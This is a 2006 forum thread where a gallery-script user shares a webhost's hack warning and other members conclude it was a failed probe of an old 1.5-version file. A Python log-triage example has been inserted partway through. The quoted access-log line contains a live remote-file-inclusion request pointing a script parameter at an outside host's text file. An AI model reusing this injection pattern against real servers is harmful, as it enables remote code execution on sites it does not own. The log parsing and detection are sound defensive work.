EE2.0 already Hacked? (BOGUS)


lost
6th of October 2006 (Fri), 11:34
Pekka,

I just got this from my webhost.

It has come to our attention that your web space has been hacked:

access.log.39.gz:84.254.189.88 - - [01/Oct/2006:19:20:35 -0400] "POST /gallery/photo_comment.php?toroot=http://www.kairosperu.org/language/blog.txt? HTTP/1.1" 200 178553 www.btoups.com "http://www.btoups.com/gallery/photo_comment.php?toroot=http://www.kairosperu.org/language/blog.txt?" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "-"

--

The above was taken from your access logs. It shows that
/gallery/photo_comment.php was used to perpetrate the hack.

Please contact the developers for this script/application. You will
likely need to install a version update and/or security patch to prevent
further abuse.

Pekka
6th of October 2006 (Fri), 11:43
To me it looks like an attempt, not hacked.
There is no file http://www.btoups.com/gallery/photo_comment.php; in EE 2.0 it is called comments.php.

photo_comment.php is from version 1.5. Did you delete all EE 1.5 files from your EE folder as instructed in the upgrade post?

lost
6th of October 2006 (Fri), 12:01
To me it looks like an attempt, not hacked.
There is no file http://www.btoups.com/gallery/photo_comment.php; in EE 2.0 it is called comments.php.

photo_comment.php is from version 1.5. Did you delete all EE 1.5 files from your EE folder as instructed in the upgrade post?


Bah... after looking at the date, it is prior to installing 2.0. I got the email a day after installing 2.0.


Please DELETE

Pekka
6th of October 2006 (Fri), 12:02
Phew! :)

wkitty42
11th of October 2006 (Wed), 22:42
To me it looks like an attempt, not hacked.
There is no file http://www.btoups.com/gallery/photo_comment.php; in EE 2.0 it is called comments.php.
It is exactly an attempt... this is a cross-site scripting attempt... I get them all the time, but they all fail for various reasons... the original poster's webhost needs to get a cluepon or face liberal use of a LART, aka cluebat ;)

All one need do to see if it is a hack is to try the very same URL the log shows ;)
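
The triage the thread walks through (an off-site URL handed to a script parameter, weighed against whether the script answered and still exists after the upgrade), as an added example that is not code from the thread or from EE: it parses the combined-format line quoted above plus two constructed lines, and the set of still-served script paths is a constructed stand-in for a real check of the webroot.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# NCSA combined format, plus two extras present in the thread's line:
# an optional "file:" prefix from zgrep and an optional vhost after the size.
COMBINED = re.compile(
    r'^(?:[^:\s]+:)?(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\d+|-) (?:(?P<vhost>[\w.-]+) )?'
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"')

def parse_combined(line):
    """Parse one log line into a dict of fields, or None if it does not match."""
    m = COMBINED.match(line.strip())
    return m.groupdict() if m else None

def remote_url_params(target):
    """(param, value) pairs whose value is an absolute http(s) URL."""
    return [(k, v) for k, v in parse_qsl(urlsplit(target).query, keep_blank_values=True)
            if re.match(r'https?://', v, re.I)]

def triage(line, served_scripts):
    """Classify one line; served_scripts = script paths that still exist (constructed set)."""
    rec = parse_combined(line)
    if rec is None:
        return 'unparsed'
    path = urlsplit(rec['target']).path
    if not remote_url_params(rec['target']):
        return 'benign'
    # An off-site URL in a script parameter is a remote-file-inclusion probe.
    # Its weight depends on whether the script answered it and still exists.
    if rec['status'].startswith('2') and path in served_scripts:
        return 'rfi_probe:script_present'
    if rec['status'].startswith('2'):
        return 'rfi_probe:script_answered_but_gone'
    return 'rfi_probe:rejected'

# The line from the thread, with the forum's auto-link residue removed.
THREAD_LINE = (
    'access.log.39.gz:84.254.189.88 - - [01/Oct/2006:19:20:35 -0400] "POST '
    '/gallery/photo_comment.php?toroot=http://www.kairosperu.org/language/blog.txt? '
    'HTTP/1.1" 200 178553 www.btoups.com "http://www.btoups.com/gallery/'
    'photo_comment.php?toroot=http://www.kairosperu.org/language/blog.txt?" '
    '"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "-"')
# Constructed lines: an ordinary page view and a probe the server turned away.
BENIGN_LINE = ('203.0.113.7 - - [01/Oct/2006:19:25:01 -0400] "GET /gallery/index.php'
               '?cat=5 HTTP/1.1" 200 4121 www.example.com "-" "Mozilla/5.0" "-"')
REJECTED_LINE = ('198.51.100.9 - - [02/Oct/2006:03:10:44 -0400] "GET /gallery/'
                 'photo_comment.php?toroot=http://203.0.113.5/x.txt? HTTP/1.1" '
                 '404 219 www.example.com "-" "Mozilla/4.0" "-"')
```

With `served_scripts={'/gallery/comments.php'}` (the EE 2.0 name) the thread's line comes back as a probe that was answered by a script that is no longer there, which is the "prior to installing 2.0" conclusion the thread reaches.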

UncleDoug
18th of October 2006 (Wed), 14:57
Backtracking on the issue with 1.5, I found several sub-domains, which I did not set up or configure, associated with my site.
Definitely remove them if they are there.